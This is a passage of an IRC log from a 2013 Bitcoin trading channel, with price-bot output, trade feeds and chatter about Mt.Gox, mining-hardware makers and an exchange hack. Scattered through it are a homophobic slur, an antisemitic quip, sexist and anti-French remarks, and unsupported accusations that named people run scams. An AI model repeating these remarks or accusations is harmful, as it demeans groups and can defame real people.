million dollah last month Apr 04 23:09:37 clearly a failure neh ? Apr 04 23:09:41 asicminer argueably, same with avalon. but they'll both need to pivot to satay an ongonig concern. mpex seems to be doing well, mtgox despite issues, is here to stay. sdice, excluding it's potential as an investment is a survivor. some of these info sites seem to be fine. Apr 04 23:09:44 mircea_popescu: put the link to trilema on the screen Apr 04 23:09:48 about goxlag Apr 04 23:09:51 lol Apr 04 23:10:04 [HAVELOCK] [SDICE] 20 @ 0.33 = 6.6 BTC [+] Apr 04 23:10:06 so they're a card tradind site. Apr 04 23:10:59 magic the gathering online exchange ftw! Apr 04 23:11:02 man i cant believe the black locus card crashed the site Apr 04 23:11:11 4mn bidders Apr 04 23:11:16 heh, if not that - what then?! Apr 04 23:11:22 haha Apr 04 23:11:29 mircea_popescu: Just because they are totally broken, and constantly going down, you can not discount userbase enthusiasm, usage history, and first mover advantage. Apr 04 23:11:59 bgupta: you can only trip over yourself so long until yoi fall into an abyss Apr 04 23:12:04 [HAVELOCK] [SDICE] 60 @ 0.34000001 = 20.4 BTC [+] Apr 04 23:12:15 bgupta why are you arguing to me ? thestringpuller was saying. Apr 04 23:12:29 but otherwise usage history is horrible. Apr 04 23:12:37 i endorse b-c too. now only if they get it online :/ Apr 04 23:12:54 obviously gox is far from ideal - but if they're goal is to provide a BTC exchange platform, I'd say so far they've been successful in that. Apr 04 23:13:05 ok, mircea_popescu, this will be my parting thought on LTC. You might like it... Apr 04 23:13:06 oh and what happened to usagi's mpex asset? can you now disclose for lulz? Apr 04 23:13:14 what ?! Apr 04 23:13:25 Twitter is a prime example of a site that started completely brokensuffered massive growing pains (and outages), and then went on to mainstream success. Apr 04 23:13:25 did you actually play magic? remember the chaos orb? Apr 04 23:13:31 TomServo: that's like saying that I'm successful human being because I'm breathing Apr 04 23:13:40 mircea_popescu: this http://bitbet.us/bet/1/usagi-ftw/ Apr 04 23:13:42 The Bitcoin Foundation should use all its funds and destroy LTC the way people destroyed IOCoin and IXCoin Apr 04 23:13:47 They basically had to bring in a whole new tech team and throw out most of what they had. Apr 04 23:13:47 bgupta twitter still is not a business/does not have a model. Apr 04 23:13:56 Lyspooner that's nonsense. Apr 04 23:14:16 that's not nonsense, that's awesome and i'm awesome Apr 04 23:14:17 gox fails in every way possible, they had months to fix this shit, they didnt. EOD Apr 04 23:14:38 mpex.co/?mpsic=S.NYAN Apr 04 23:14:39 Yet it's still possible to sell/buy BTC there so... I'm not sure I agree. Apr 04 23:14:40 Scrat let me find this link for you Apr 04 23:14:55 jurov: LOLOLOL Apr 04 23:14:58 jurov dafuck is that ?! Apr 04 23:15:04 Lyspooner there is no 'bitcoin foundation' and how would that benefit anyone? Apr 04 23:15:18 Scrat http://www.youtube.com/watch?v=wpbYCfCfT1Y Apr 04 23:15:30 there is a bitcoin foundation and it doesn't benefit anyone Apr 04 23:15:46 well, it benefits the people that draw a salary from it Apr 04 23:15:47 Lyspooner actually it's vessenes' little scam to try and float a little coin Apr 04 23:15:55 guy's the ceo treasurer and blabla of it, Apr 04 23:16:04 got donations (from idiots), never published a report Apr 04 23:16:04 [HAVELOCK] [VTX] 43 @ 0.435 = 18.705 BTC [-] Apr 04 23:16:05 And gox just recently had to handle 10x their usual volume and increased ddos attacks of course they're struggling Apr 04 23:16:11 perfect case for going to jale Apr 04 23:16:40 which one is vessenes Apr 04 23:17:04 the ycombinator schmoozie. Apr 04 23:17:11 mircea_popescu: What is/are NAT.ROUTERS? Apr 04 23:17:16 mircea_popescu: lol Apr 04 23:17:19 That said I'm all for a decentralized exchange or at least a few more good options. Apr 04 23:17:28 TomServo itams of connectivity within the interwebs Apr 04 23:17:36 nyuk nyuk Apr 04 23:17:40 :D Apr 04 23:17:48 Just a joke? Apr 04 23:17:55 [MPEX] [S.MPOE] 4234 @ 0.00070232 = 2.9736 BTC [-] Apr 04 23:18:13 yea Apr 04 23:19:56 sry for confusion. i misread "but otherwise usagi history is horrible." Apr 04 23:24:22 [BTCTC] [ASICMINER-PT] 1 @ 0.7698 BTC [-] Apr 04 23:26:56 [BTCTC] [S.DICE-PT] 1 @ 0.00381 BTC [-] Apr 04 23:26:59 [BTCTC] [S.DICE-PT] 25 @ 0.0038 = 0.095 BTC [-] Apr 04 23:27:00 [BTCTC] [S.DICE-PT] 85 @ 0.0036 = 0.306 BTC [-] Apr 04 23:30:52 ;;ticker Apr 04 23:30:52 BTCUSD ticker | Best bid: 134.80000, Best ask: 134.88800, Bid-ask spread: 0.08800, Last trade: 134.88000, 24 hour volume: 117768.41535527, 24 hour low: 110.00000, 24 hour high: 142.12000, 24 hour vwap: 127.86503 **** BEGIN LOGGING AT Fri Apr 5 05:41:44 2013 Apr 05 05:41:47 I need to get funding from them Apr 05 05:41:53 100 million is not much of a promise Apr 05 05:41:57 per year Apr 05 05:42:02 -NickServ- You failed to identify in time for the nickname mircea_popescu Apr 05 05:42:22 you can fund a lot of labs with 100 million Apr 05 05:42:45 a typical "big" grant to run a lab, an R01, averages about $250k/yr for 5 years. **** ENDING LOGGING AT Fri Apr 5 05:43:08 2013 **** BEGIN LOGGING AT Fri Apr 5 05:44:04 2013 Apr 05 05:44:20 ;;ticker Apr 05 05:44:21 BTCUSD ticker | Best bid: 131.20003, Best ask: 132.14430, Bid-ask spread: 0.94427, Last trade: 132.14431, 24 hour volume: 74652.69434725, 24 hour low: 117.21000, 24 hour high: 142.12000, 24 hour vwap: 132.39843 Apr 05 05:44:50 well, if I get the job I will try to get that money. In my current position, budget is basically unlimited Apr 05 05:44:55 But power is low Apr 05 05:45:24 but you have like at least 1mn in btc Apr 05 05:45:28 so why not liquidate and start a lab? Apr 05 05:45:31 for 4 years Apr 05 05:45:41 I am not a bitcoin millionarie Apr 05 05:45:52 you guys overestimate Apr 05 05:46:14 Did you lose a bit on that put-based position awhile back? Apr 05 05:46:25 he lost it all on gox Apr 05 05:46:27 I have lost a lot on puts Apr 05 05:46:29 lol Apr 05 05:46:46 but yah, did lose on that put play at the end of last month Apr 05 05:46:56 gox better send me mah cash Apr 05 05:47:01 your call play raped all though Apr 05 05:47:14 I wish I had more Apr 05 05:47:18 string puller are you "the girl" somewhere else? Apr 05 05:47:22 only put 20% down. Apr 05 05:47:32 Haha. I'm not female. Apr 05 05:47:46 There are no females in bitcoin, except those mircea_popescu pays Apr 05 05:47:57 and aethero's wife Apr 05 05:48:08 i was just gonna say that string! Apr 05 05:48:12 you typed faster Apr 05 05:48:46 its the internet Apr 05 05:48:48 mircea_popescu should make an exchange Apr 05 05:48:49 oh yea Apr 05 05:48:50 nvm Apr 05 05:48:53 ie, no girls Apr 05 05:49:04 yeah - I thought you knew a bit too much about the mpex sentiment index. kinda like what a girl would have to know if they were under the employ of mircea_popescu Apr 05 05:49:41 cole is MPOE-PR Apr 05 05:49:43 deflecting Apr 05 05:49:49 this is going well... Apr 05 05:49:53 There was also the wife of Kludge, who's money was involved in bitcoins, even if she want. Apr 05 05:49:58 wasnt Apr 05 05:50:10 Bugpowder she wasn't his wife. Apr 05 05:50:11 MPOE-PR is probably the most anonymous PR agent I've ever seen. Apr 05 05:50:35 he considers her his wife, she considers him a limited liability. Apr 05 05:51:01 limited? Apr 05 05:51:26 mircea_popescu: you know, now that I think about it. You are the only public facing individual of mpex. MPOE-PR is very private (in a sense), and the other "board members" are illuminati style hidden. Apr 05 05:51:37 well she did cut him off once he was costing more than what the naked housecleanning + toe suckling was worth neh ? Apr 05 05:51:45 thestringpuller yes. Apr 05 05:51:53 fair enough lol Apr 05 05:52:04 mircea_popescu is the bitcoin illuminati, be warned! Apr 05 05:52:06 [BTCTC] [ASICMINER-PT] 1 @ 0.7697 BTC [-] Apr 05 05:52:09 no i'm not Apr 05 05:52:11 i just work here. Apr 05 05:52:38 how is she anon anyway Apr 05 05:52:47 there's like... one person on all the forum using their face in their avatar. Apr 05 05:53:01 and that's the one you call anon. Apr 05 05:53:06 how about everyone else then Apr 05 05:53:25 wait, evoorhees isnt a jester? Apr 05 05:53:27 no one knows her name, just what people speculate Apr 05 05:53:37 I'm sorry I brought her up. Apr 05 05:53:38 selling all my sdice then Apr 05 05:53:42 she could be romanian, but who knows Apr 05 05:54:00 her connection to you is only a GPG signed credential Apr 05 05:54:13 since you haven't disclosed that you've met in person Apr 05 05:54:18 it's quite interesting :) Apr 05 05:54:20 Maria Puella Octavia Eufrosina - Patricia Raphaella de Ruiz y Picasso Apr 05 05:54:38 sounds expensive Apr 05 05:54:46 well she's tall Apr 05 05:54:56 and she's not romanian, she's murican. Apr 05 05:55:49 If that was the name of someone, I take back what I said about expensive. I'm from Missouri. Apr 05 05:56:16 Missouri is one of the few states I've consistently gotten laid in. Apr 05 05:56:17 now saying its cheap?? Apr 05 05:56:28 lol Apr 05 05:56:47 Mid-Western girls are bored by default. Apr 05 05:57:20 if you mention my sister I'm gonna have to open up a can of wupass Apr 05 05:57:28 modwestern anything-with-eyes is bored by default, no? Apr 05 05:57:58 modwestern, heh, sounds like a fashion trend Apr 05 05:58:07 I went to Truman for a visit...man those girls no how to party. Apr 05 05:58:19 For being in the middle of nowhere, bajeezus. Apr 05 05:58:32 know* (can't grammar tonight) Apr 05 05:59:20 [BTCTC] [BTC-BOND] 7 @ 0.00999 = 0.0699 BTC [-] Apr 05 06:00:30 mircea_popescu how did you stabilize the price? Apr 05 06:00:39 with his bare hands Apr 05 06:00:52 lol Apr 05 06:01:02 I do want to know though... Apr 05 06:01:09 well... you know how they say if you wish for something really really hard it comes true ? Apr 05 06:01:13 this works for some people. Apr 05 06:01:54 This is a movement I can support. http://www.theatlantic.com/infocus/2013/04/femen-stages-a-topless-jihad/100487/ Apr 05 06:02:11 cole_albon: It's called The Secret Apr 05 06:02:18 have you read it/ Apr 05 06:02:39 This is how I made my calls make money Apr 05 06:03:01 http://en.wikipedia.org/wiki/The_Secret_(book) Apr 05 06:03:11 I just visualized success. Apr 05 06:03:17 Bugpowder http://trilema.com/2010/cum-se-protesteaza-corect/ Apr 05 06:03:24 that's me explaining to romanians how to correcrtly protest Apr 05 06:03:24 I'm glad you made money Bugpowder I should have listened to you - you were right. Apr 05 06:03:25 this one is dope http://cdn.theatlantic.com/static/infocus/femen040413/s_f15_65342447.jpg Apr 05 06:03:31 after they made some fail demonstrations of fail. Apr 05 06:04:15 wow that was dope Apr 05 06:04:17 I need to get back to my price rise visualizations again Apr 05 06:04:47 why not visualize a price crash Apr 05 06:04:48 so two chicks followed me on twitter this hour. Apr 05 06:04:50 and make money on puts this time Apr 05 06:04:51 I sense... an awareness of another... suppressing the price Apr 05 06:05:02 one's an investment fund partner, the other's a make-up artist and fashion broad. Apr 05 06:05:05 My powers only work one way Apr 05 06:05:06 i think the internets r broken Apr 05 06:05:15 I gotta go find my credits Apr 05 06:05:32 mircea_popescu I met a romanian girl at my bank Apr 05 06:05:36 Simona Apr 05 06:05:40 sounds romanian Apr 05 06:05:42 you should teach me romanian so I can seduce her Apr 05 06:05:50 ;) Apr 05 06:05:52 say "ce frumoasa esti" to her, see what happens Apr 05 06:06:02 [HAVELOCK] [SDICE] 8 @ 0.31511 = 2.5209 BTC [-] Apr 05 06:06:03 [HAVELOCK] [SDICE] 9 @ 0.3151 = 2.8359 BTC [-] Apr 05 06:06:04 [HAVELOCK] [SDICE] 33 @ 0.315 = 10.395 BTC [-] Apr 05 06:06:19 forecast for tomorrow "mircea_popescu: I got slapped!!!!" Apr 05 06:06:46 this is why you're single. you have no clue what happens next wioth girls. Apr 05 06:06:48 mp, did you do a hacker bat signal to ddos mtgox on the rally to 147? Apr 05 06:06:51 HAHAHA Apr 05 06:07:06 a bat whaty Apr 05 06:07:17 did you call in the troops? Apr 05 06:07:37 we'll never know Apr 05 06:07:37 i cant speak without using cliches and expressions, sry :) Apr 05 06:07:56 no i didn't. Apr 05 06:08:01 bat signal is like a spot light in the sky that shows a pic of a bat, batman sees this then goes to save the day Apr 05 06:08:08 comicbooks/cartoons Apr 05 06:08:44 another possiblilty is that the price had to crash because it was up 45% in 12 hours. Apr 05 06:09:00 http://pastebin.com/4SUXv67h Apr 05 06:09:02 [HAVELOCK] [VTX] 1 @ 0.449992 BTC [-] Apr 05 06:09:21 jews did 04/03/03 Apr 05 06:09:21 mircea_popescu I don't think I've seen an s.dice dividend yet have I? Apr 05 06:09:26 my theory is still that a bottleneck at gox caused the rally Apr 05 06:09:27 and Bugpowder has it. in certain circumstances things need to chose one or the other of two paths Apr 05 06:09:28 yeah, 42% was too much, i hope this is now some stability, \ Apr 05 06:09:31 bitcoin chose the light. Apr 05 06:09:31 lack of deposits Apr 05 06:09:42 ThickAsThieves: yeah Apr 05 06:09:44 cole_albon i dunno, is it on the mpex page ? Apr 05 06:09:48 BTC deposit delay Apr 05 06:09:57 i just wanted to ask mp outright, rather than have people wonder Apr 05 06:10:00 I was waiting 35 confirmations Apr 05 06:10:07 even if he lied about it obv ;) Apr 05 06:10:09 everyone else must have been too. Apr 05 06:10:11 yes, but I do not recall seeing it in any STAT so far. Apr 05 06:10:12 Bugpowder has it. Its a -dev safety valve Apr 05 06:10:27 ;;bids - Apr 05 06:10:27 Error: '-' is not a valid floating point number. Apr 05 06:10:30 ;;bids 0 Apr 05 06:10:32 stop the network transacting to protect from bubble Apr 05 06:10:32 There are currently 31092307 bitcoins demanded at or over 0.0 USD, worth 10131721.5745 USD in total. | Data vintage: 0.0099 seconds Apr 05 06:10:37 maybe MPOE-PR did it Apr 05 06:10:38 if you look at the times, the rally was broken and the trend reversing hours before mtgox was blinking Apr 05 06:10:40 ohhhh hai! Apr 05 06:10:48 back over $10 million! Apr 05 06:10:59 RALLLY TIME Apr 05 06:11:08 ;;asks 999999999999 Apr 05 06:11:09 There are currently 63713.817 bitcoins offered at or under 999999999999.0 USD, worth 1.46160793292e+12 USD in total. | Data vintage: 36.6863 seconds Apr 05 06:11:15 peanut butter rally time Apr 05 06:11:17 -visualizing- Apr 05 06:11:31 heh. i wonder if anyone realises that with ~5% of btc on their system, mtgox barely matters in the scheme of things Apr 05 06:11:57 not many realize that Apr 05 06:11:57 i have more than realized that Apr 05 06:11:59 fuck gox Apr 05 06:12:03 I am just amazed that the super early adopters don't sell at least a little. Apr 05 06:12:25 BTW - mircea_popescu, Rassah actually ISN'T my friend. Apr 05 06:12:33 it was all a terrible misunderstanding Apr 05 06:12:33 how many 100,000+ owners do you think their are? Apr 05 06:12:40 there Apr 05 06:12:43 I know of one. Apr 05 06:12:44 heh. Apr 05 06:12:46 personally Apr 05 06:12:53 didn't know he had so much Apr 05 06:12:57 mircea_popescu: the question is who would rise from the ashes? bitcoin-central? Apr 05 06:13:01 till 2 nights ago Apr 05 06:13:04 what ever happened to rassah ? i remember he busting his ballsack over having sold at 20 and bought a new car Apr 05 06:13:05 he hasn't sold any Apr 05 06:13:06 and how smart he is. Apr 05 06:13:11 i guess sepukku ? Apr 05 06:13:38 speaking of suicide, whats up with BFL? Apr 05 06:13:47 dead spasms Apr 05 06:13:51 fuck bitcoin, at this rate im buying the 86 with ppcoin Apr 05 06:14:01 i can't understand that retarded bets of bitcoin dood. Apr 05 06:14:04 BFLspecs are down, plus deay Apr 05 06:14:09 pushing that bet ? what is he, braindead ? Apr 05 06:14:13 plus higher prices Apr 05 06:14:18 mircea_popescu I apologize I read 04-03-13 as April 3rd. I'm from Missouri Apr 05 06:14:20 yeah higher prices Apr 05 06:14:23 bfl is fucked Apr 05 06:14:29 one of my friends I turned on to bitcoin bought a loaded Golf TDI tonight Apr 05 06:14:31 if BFL changes posted specs, does that affect bitbets Apr 05 06:14:32 i wonder how they can ship out the first units Apr 05 06:14:45 he invested $500. Just cashed out a fraction.. Apr 05 06:15:02 BFL has plenty units ready Apr 05 06:15:05 <3 BFL Apr 05 06:15:05 they are just using them Apr 05 06:15:07 they said the 66 wont ship now, get two of the 32, then lol its only 25 Apr 05 06:15:16 don't care that I paid $13k for a non existant asic Apr 05 06:15:31 AM is going to make bank Apr 05 06:15:52 ;;ticker Apr 05 06:15:53 BTCUSD ticker | Best bid: 134.48668, Best ask: 134.48700, Bid-ask spread: 0.00032, Last trade: 134.48668, 24 hour volume: 74092.84282738, 24 hour low: 117.21000, 24 hour high: 142.12000, 24 hour vwap: 132.56604 Apr 05 06:16:00 ;;goxlag Apr 05 06:16:01 MtGox lag is 5.304483 seconds. During this time, light travels 0.01063012454 AU. You could have sent a bitcoin from Jupiter to its second largest moon, Callisto (0.012567 AU). Apr 05 06:16:06 dub i thought you weren't into btc, too risky. Apr 05 06:16:08 redistribution of wealth from america to china, AGAIN Apr 05 06:16:14 AM is goingto rape:) Apr 05 06:16:28 ChaangNoi they still haven't got 12 th online you know Apr 05 06:16:35 their chips still are blowing up like chinese lightbulbs. Apr 05 06:16:40 they are building a data center Apr 05 06:16:41 mircea_popescu: btc is for fags Apr 05 06:16:48 yeah sure. and an island Apr 05 06:16:56 mp, im happy to wait, cuz they going to rape Apr 05 06:17:07 i dont know about the island, but that is not a bad idea Apr 05 06:17:12 they will be able to afford it Apr 05 06:17:16 nation of btc! Apr 05 06:17:17 I have an island Apr 05 06:17:21 powered by am! Apr 05 06:17:32 listen, everyone's getting raped just as soon as someone with a clue starts doing it. Apr 05 06:17:43 asic producers, miners, fiat exchanges, the works. Apr 05 06:17:49 "Butterfly Labs aka BFL will deliver ASIC Bitcoin mining devices to their customers before 1st of July 2013. Devices must be in scope of at least +-10% of advertised performance in order to be accepted as valid." Apr 05 06:17:54 pretty much nothing you see today will be here as bitcoin reaches maturity. Apr 05 06:17:57 i have faith in friedcat, yes, there was a delay but its not cuz his hardware failed Apr 05 06:17:59 they changed advertised specs Apr 05 06:18:02 soooo? Apr 05 06:18:08 mircea_popescu: what about you? will you remain? Apr 05 06:18:17 myeah. Apr 05 06:18:20 ThickAsThieves so what ? Apr 05 06:18:27 ThickAsThieves: did it change for existing orders? Apr 05 06:18:47 hmmm Apr 05 06:18:51 that is a sticky wicket Apr 05 06:19:00 wat Apr 05 06:19:10 ChaangNoi that theory would have been easily enough proven by delivering on their promise to send samples to community members. Apr 05 06:19:16 they didn't, and aren't mentioning it again. Apr 05 06:19:18 it doesnt say anything about when people order Apr 05 06:19:29 just advertised specs Apr 05 06:19:37 mp they are going to sell them in auction style Apr 05 06:19:42 i guess you are not a board member? Apr 05 06:19:57 i just use more salt to digest friedcat's stuff than you people. Apr 05 06:20:13 well if you are right in the end, i will have less btc Apr 05 06:20:16 for instance, when someone promises something and then they don't deliver on their promise, even if they're chinese Apr 05 06:20:19 mircea_popescu: I thought china could do no wrong? Apr 05 06:20:22 i don't jump to the unrelated "they will x" Apr 05 06:20:30 dub eh ? Apr 05 06:20:40 well buy AM stock or more gpus... hmmm Apr 05 06:20:54 you're always talking up china Apr 05 06:21:00 even if AM does what they say, it doesnt mean there wont be more delays Apr 05 06:21:11 $10.23MM Apr 05 06:21:15 actually no matter what, delays there will be Apr 05 06:21:52 new indicator, beats OIX Apr 05 06:21:53 http://jezus.si/graf/dashboards/bitcoin/details/1 Apr 05 06:22:02 just cuz friedcat was first doesnt mean he will do everything right the first time Apr 05 06:22:18 arguably first* Apr 05 06:22:31 ;;seen smickles Apr 05 06:22:31 smickles was last seen in #bitcoin-assets 11 hours, 39 minutes, and 57 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 05 06:22:55 kakobrekla cool, that'll be useful next sturles shows up Apr 05 06:22:57 AM and friedcat is looking like the best bet right now on asics as far as i can invest, bfl, hhhaa no, avalon? maybe but at this price, no Apr 05 06:23:10 i like AM, but i dont like repeatedly moving targets Apr 05 06:24:15 they'll be more in the market soon surely Apr 05 06:24:58 AM has said they will shoot for 10% average over a year Apr 05 06:25:08 what does AM stand for? Apr 05 06:25:10 https://bitcointalk.org/index.php?topic=167459.msg1743668#msg1743668 Apr 05 06:25:13 dude this sort of shit. Apr 05 06:25:20 not a moving target... they also say they have a bunch of chips, but no power... Apr 05 06:25:24 "our system did something we don't know why it happens nm we'll undo it manually" Apr 05 06:25:26 i'm like... Apr 05 06:25:39 thestringpuller: asicminer Apr 05 06:25:57 mircea_popescu: lol Apr 05 06:26:25 yankee... Apr 05 06:27:22 mircea_popescu: send them some of your programmers Apr 05 06:28:14 mp why not make a romanian exchange? Apr 05 06:28:25 ^-this Apr 05 06:29:08 im not interested in handling fiat. Apr 05 06:29:13 Is romania signed on to FATCA? Apr 05 06:29:15 i'm not interested in writing code Apr 05 06:29:23 i'm not going to be the mother of bitcoin invalids. Apr 05 06:29:29 how about other people do their job too. Apr 05 06:29:45 Bugpowder it makes jack shit of a difference, i could easily do it. Apr 05 06:29:54 i know half the bankers in the country. Apr 05 06:30:17 unlike absolutely any other bitcoiner i can just walk into a bank's boardroom and talk to the board. Apr 05 06:30:22 but i'm not interested in doing fiat. Apr 05 06:31:32 btcguild 48% time ot fire the lazorz? Apr 05 06:31:53 mircea_popescu: it will be funny when I drop your name to simona tomorrow and she happens to know you...for some reason... Apr 05 06:32:02 seems unlikely. Apr 05 06:32:13 ;;nethash Apr 05 06:32:14 56918.28101 Apr 05 06:32:41 ltc still over $4 lol Apr 05 06:32:44 ;;calc [nethash]*0.48 Apr 05 06:32:44 27320.7748848 Apr 05 06:33:03 [MPEX] [S.MPOE] 10369 @ 0.00070698 = 7.3307 BTC [-] Apr 05 06:33:24 i think AM might have some kind of balancer that moves hashes to oxcoin Apr 05 06:33:38 ozcoin* Apr 05 06:33:39 I started with 0.1. I made it to 0.2 playing over a week and 200 transactions later. Then it went down to 0.04. Then I made it go back up to 0.2. After 400 transactions later, I lost it all in a do-or-die bet, the final bet was 0.04 or something like that. Apr 05 06:34:05 ThickAsThieves: they should be soloing ppcoin Apr 05 06:34:27 https://bitcointalk.org/index.php?topic=167215.msg1741392#msg1741392 Apr 05 06:34:27 ;;asks 139.90 Apr 05 06:34:28 There are currently 3545.7036 bitcoins offered at or under 139.9 USD, worth 489984.985767 USD in total. | Data vintage: 97.0218 seconds Apr 05 06:34:32 the instawallet was actually haxt Apr 05 06:35:28 instalollet was french? Apr 05 06:36:11 so that 14k BTC transaction was theirs or not? Apr 05 06:37:25 the duns were fully under their control Apr 05 06:37:33 funds* Apr 05 06:38:14 yea Apr 05 06:38:28 well... i guess the 40k rthey moved was some panic attack. Apr 05 06:38:32 but they had already lost some Apr 05 06:38:42 anyway, i dunno, davout is awol. Apr 05 06:38:51 this is wrong with these people, they fuck up, they dissapear. Apr 05 06:38:54 he should be here. Apr 05 06:39:13 they are french, they probably just handed over privkeys to the hackers Apr 05 06:39:43 ;;bids 0 Apr 05 06:39:43 There are currently 31095190 bitcoins demanded at or over 0.0 USD, worth 10470655.1418 USD in total. | Data vintage: 7.9970 seconds Apr 05 06:39:48 heheh Apr 05 06:39:52 we are going up tonight Apr 05 06:39:57 get ready Apr 05 06:44:35 my rocket is ready Apr 05 06:44:55 hmm today is a friday Apr 05 06:45:50 yeah i know Apr 05 06:46:02 10.5 Apr 05 06:46:23 the weekend dip happened before the weekend Apr 05 06:48:25 [BTCTC] [ASICMINER-PT] 1 @ 0.7697 BTC [-] Apr 05 06:48:57 heh. Apr 05 06:49:05 Bugpowder why be such a noob ? Apr 05 06:49:13 bitcoin is a lot more than "quick profits" you know. Apr 05 06:50:54 I am happy to take a pause from rapid price gains on say... April 27th. Apr 05 06:51:34 At this point though, I've cashed enough out that I'm just gonna sit on the rest for a long time Apr 05 06:51:45 or actually use them in the economy Apr 05 06:51:53 [BTCTC] [RSM] 50 @ 0.0025 = 0.125 BTC [-] Apr 05 06:52:02 [HAVELOCK] [VTX] 2 @ 0.449992 = 0.9 BTC [-] Apr 05 06:52:59 what's on april 27th Apr 05 06:53:32 options will have expired Apr 05 06:53:37 :-D Apr 05 06:53:49 [BTCTC] [ASICMINER-PT] 1 @ 0.7698 BTC [+] Apr 05 06:54:40 o lol Apr 05 07:00:33 [MPEX] [O.USD.C062N] 10 @ 0.73421811 = 7.3422 BTC Apr 05 07:07:08 [BTCTC] [ASICMINER-PT] 1 @ 0.7698 BTC [+] Apr 05 07:07:22 [BTCTC] [ASICMINER-PT] 3 @ 0.7698 = 2.3094 BTC [+] Apr 05 07:07:25 [BTCTC] [ASICMINER-PT] 20 @ 0.7699 = 15.398 BTC [+] Apr 05 07:07:28 [BTCTC] [ASICMINER-PT] 5 @ 0.78 = 3.9 BTC [+] Apr 05 07:08:14 [BTCTC] [ASICMINER-PT] 3 @ 0.7829 = 2.3487 BTC [+] Apr 05 07:19:02 [HAVELOCK] [HIM] 1 @ 1.919 BTC [+] Apr 05 07:20:27 btc-e charging .5ltc to withdraw, that's like $2.20 Apr 05 07:23:45 ;;ticker Apr 05 07:23:46 BTCUSD ticker | Best bid: 135.80001, Best ask: 136.00000, Bid-ask spread: 0.19999, Last trade: 136.00000, 24 hour volume: 70079.70788410, 24 hour low: 126.69058, 24 hour high: 142.12000, 24 hour vwap: 133.76636 Apr 05 07:23:56 ;;goxlag Apr 05 07:23:57 MtGox lag is 0.952282 seconds. During this time, light travels 0.00190836246572 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 05 07:24:04 $avg Apr 05 07:24:05 ThickAsThieves: 133.55 Apr 05 07:24:45 [BTCTC] [BTC-BOND] 10 @ 0.009999 = 0.1 BTC [+] Apr 05 07:24:51 [BTCTC] [BTC-BOND] 616 @ 0.01 = 6.16 BTC [+] Apr 05 07:24:55 [BTCTC] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [+] Apr 05 07:24:58 [BTCTC] [BTC-BOND] 564 @ 0.01 = 5.64 BTC [+] Apr 05 07:31:24 [BTCTC] [ASICMINER-PT] 5 @ 0.7829 = 3.9145 BTC [+] Apr 05 07:39:44 Is there any channel good for discussing trading btc/ltc/nmc etc? Apr 05 07:40:53 Don't know about a good channel, but you are in a channel. ;) Apr 05 07:42:56 someone just bought like 3200 btc at the market Apr 05 07:43:50 ;;ticker Apr 05 07:43:51 BTCUSD ticker | Best bid: 137.38456, Best ask: 137.98900, Bid-ask spread: 0.60444, Last trade: 137.38456, 24 hour volume: 72490.77444922, 24 hour low: 126.69058, 24 hour high: 142.12000, 24 hour vwap: 134.00274 Apr 05 07:46:47 http://finance.yahoo.com/news/bank-japan-scraps-overnight-call-051241190.html Apr 05 07:51:37 wait Japan is gonna double the amount of currency in two years, did i read that correctly? Apr 05 07:52:16 1.4 trillion in commited QE Apr 05 07:52:31 hold on to your seats Apr 05 07:56:23 going to bed, i expect you guys to get btc up to 140 while i sleep Apr 05 07:56:55 [MPEX] [S.MPOE] 4450 @ 0.00070686 = 3.1455 BTC [-] Apr 05 07:58:44 [BTCTC] [ASICMINER-PT] 1 @ 0.7829 BTC [+] Apr 05 08:10:33 ;;ticker Apr 05 08:10:34 BTCUSD ticker | Best bid: 135.55406, Best ask: 136.83316, Bid-ask spread: 1.27910, Last trade: 135.55405, 24 hour volume: 71104.21539651, 24 hour low: 126.69058, 24 hour high: 142.12000, 24 hour vwap: 134.14703 Apr 05 08:14:06 im a goat! Apr 05 08:18:13 so is this Japan thing another sign that fiat is in trouble, and that btc is where we should be? Apr 05 08:18:26 yes pinky Apr 05 08:18:59 so borrow Yen, and buy btc.. Apr 05 08:19:20 (Not that I can really borrow Yen ATM.. Apr 05 08:19:20 japan?? Apr 05 08:19:31 http://finance.yahoo.com/news/bank-japan-scraps-overnight-call-051241190.html Apr 05 08:19:40 why are they talking about Japan and dollars? Apr 05 08:19:41 read it goat Apr 05 08:19:48 reading, thanks Apr 05 08:19:49 japan is fucked Apr 05 08:19:57 seems that way Apr 05 08:20:06 japan has been fucked. Apr 05 08:20:09 no more fucked than EU, or USA for that matter Apr 05 08:20:18 they've been doing this for 30 years tho Apr 05 08:20:23 their debt:gdp ratio is far worse than that of the US, whose is terrible. Apr 05 08:20:24 they're hurrying the end then Apr 05 08:20:31 So yea, far more fucked. Apr 05 08:20:38 By an order of magnitude I'd say. Apr 05 08:20:49 ok... Apr 05 08:21:06 i heard AUD is trading against yuan directly soon too Apr 05 08:21:17 no more of that pesky USD reserve Apr 05 08:21:24 http://en.wikipedia.org/wiki/List_of_countries_by_public_debt Apr 05 08:21:28 Look at Japan. Apr 05 08:21:36 OK, so not an order of magnitide, but still a lot more. Apr 05 08:21:51 yeah japan was250% Apr 05 08:22:13 i bought a bunch of yen a while ago, made 20% in 2 years, sold it howevere Apr 05 08:22:16 [BTCTC] [ASICMINER-PT] 1 @ 0.769 BTC [-] Apr 05 08:22:19 [BTCTC] [ASICMINER-PT] 2 @ 0.7689 = 1.5378 BTC [-] Apr 05 08:22:22 [BTCTC] [ASICMINER-PT] 3 @ 0.7689 = 2.3067 BTC [-] Apr 05 08:22:26 but this really is what they have been doing forever Apr 05 08:23:31 i was reading a reddit post comparing bitcoin to paypal earlier Apr 05 08:23:55 the author reason we're on a $900+ dollar correction right now Apr 05 08:24:01 for the next 60 days at least Apr 05 08:24:08 I think the only reason a lot of ppl use pp is because it made international payments easy. Apr 05 08:24:11 it was pretty insightful Apr 05 08:24:15 but it's reddit Apr 05 08:24:18 so... Apr 05 08:24:21 Now bitcoin does that. Apr 05 08:24:34 Most all of the overseas suppliers I order from, they want paypal. Apr 05 08:24:35 How is that they are worse than greece but not as fucked as greece. Guessing cause they control their own currency. Apr 05 08:25:06 denialdenial: Link? Apr 05 08:25:16 i would expect the japanese to at least make a trillion dollar samurai sword or something Apr 05 08:25:54 http://www.reddit.com/r/Bitcoin/comments/1bo02h/why_1000_in_60_days_a_paypal_comparison/ Apr 05 08:25:59 second page midways Apr 05 08:26:08 /r/bitcoin Apr 05 08:28:58 One catch in the theory.. proposited.. it assumes that people using btc for transfer will keep the btc in btc, and not immediately trade back to fiat.. Apr 05 08:29:21 that said some of them will. Apr 05 08:29:44 so there is 